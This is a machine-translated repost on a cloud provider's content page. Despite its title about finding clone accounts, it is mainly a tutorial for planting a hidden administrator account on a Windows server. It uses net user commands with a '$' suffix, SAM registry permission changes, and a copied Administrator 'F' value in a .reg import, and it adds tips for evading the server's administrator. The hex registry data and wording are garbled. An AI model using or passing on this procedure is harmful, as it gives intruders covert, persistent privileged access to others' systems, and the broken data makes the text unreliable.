Find the clone account on the server

Source: Internet
Author: User

Create InternetUser $ user first
C:> net user InternetUser $ password123/add
// Add $ at the end to make it invisible to the net user in the console.

Run regedt32.exe(region is not regedit.exe)
Find HKEY_LOCAL_MAICHINESAMSAM and click it. Then, in the menu "security"-> "permission", add the account or group you are currently logged on,

Check "permission"-> "Full Control"-> "allow", and then confirm.
(For example, we logged on with guest just now, but it is already in the administrators group. Therefore, we need to change the ADMINISTRATORS group to allow

Full control, and the following keys, Domains, accounts, and users must do this step by step. However, if the default group of the guest user is not changed

So that you can directly read local sam information.

Run regedit.exe
Open HKEY_LOCAL_MAICHINESAMSAMDomainsaccountuseramesInternetUser $
Check that the default key value is "0x3f1" and export it as follows:
HKEY_LOCAL_MAICHINESAMSAMDomainsaccountuseramesASPNET $ InternetUser $. reg
Hkey_local_machinesamsamdomainsaccountusers%3f1 is 3f1. reg
HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4 is lf4.reg (the corresponding key of the Administrators)
Open lf4.reg in notepad and find the following "F" value. For example


"F" = hex: 02,00, 01,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,
, 20, 97, b7, 13, 99, 50, c2, 01, ff, 7f, 40, 6e, 9f, 50, c2, 01,
F4,
, 00, 00

Copy it, open 3f1. reg, find the value of "F", delete it, and paste the above section.
Open aspnet $. reg and copy the content.

[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNamesInternetUser $]
@ = Hex (3f1 ):

Go back to 3f1. reg and paste the above section to the end of the file. The final generated file content is as follows:
Windows Registry Editor Version 5.00

[Hkey_local_machinesamsamdomainsaccountusers%3f1]
"F" = hex: 02,00, 01,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,
, 20, 97, b7, 13, 99, 50, c2, 01, ff, 7f, 40, 6e, 9f, 50, c2, 01,
F4,
, 00, 00
"V" = hex:, 00, d4, 02, 00, d4, 00, 1a, 00, 00,
00, f0, 00,00, 00,10, 00,00, 00,00, 00,00, 00,00, 01,00, 00,12, 00,00, 00,00, 00,00, 00,
,
, 00, 00, 00, 01,
,
, 00, 00, 00, 00, a8, 00, 2c, 00, 00,
08,00, 00,00, 01,00, 00,00, 34,01, 00,00, 14,00, 00,00, 00,00, 00,00, 48 ,01, 00,00, 14,
, 00, 00, 00, 5c, 00, 00, 00, 00, 00, 00,
, 00, b4, 00, 00, c4,
,
, 00, 02, c0, ff, 07, 0f, 01, 00, 00, 02,
, 00, 00, 00, 00, 1b, 01, 00, 00,
, 00, ff, 07, 0f,
, 18, 00, ff, 07, 0f, 00, 00,
, B4, b7, cd, 22, dd,
E8, e4, 1c, be, 04, 3e, 32, e8, 00, 00, 00, 02,
,
, 00, dc, 8f, 0b, 7a,
4c, 68,62, 97, a9, 52, 4b, 62,10, 5e, 37,62, d0, 63, 9b, 4f, dc, 8f, 0b, 7a, 4f, 53, a9,,
, 10, 5e, 37,62, 01,00, ff, ff, ff,
Ff, 88, d7, f1, 01,02, 00,00, 07,00, 00,00, 01,00, 01,00, db, 57, a2, 94, f8, 41,63,
Fa, 2c, 88, d7, f1, cd, 99, cf, 0d, 01,00, 01,00, a0, 05,70, 54, f3, 45, 3e, 4a, 64,95, ef, 6c,
37, f1, 02, cf, 01,00, 01,00, 01,00, 01,00


[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNamesInternetUser $]
@ = Hex (3f1 ):

Save and delete the InternetUser $ user
C:> net user InternetUser $/delete
Run regedit.exe to import the modified 3f1. reg file.
Start regedt32.exe and find HKEY_LOCAL_MAICHINESAMSAM. Then click "security"-> "permission" in the menu to delete the file.

The added user (for example, the guest just used, and changed the settings of the Administrators group, so it corresponds to the previous

The Group also needs to be changed, and the keys, Domains, accounts, and users under SAM must all do so step by step. However, if the default group of the guest user is not changed,

There is no need to be so troublesome here, level 1 ).
In this way, we have created an account InternetUser $ that is not visible in the console using net user and "Computer Management", but cannot be changed.

The password is displayed in "Computer Management" after you change the password. Note that you should log out every login (whether cloned or not,

Rather than close the window directly, otherwise it will be seen in "Terminal Service Manager", and the Administrator may find a problem when logging out after logging on.

, How can it be "deregistering InternetUser $ ..."!!!

This is how they behave.

You know, webmaster.

So you should know how to do it.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.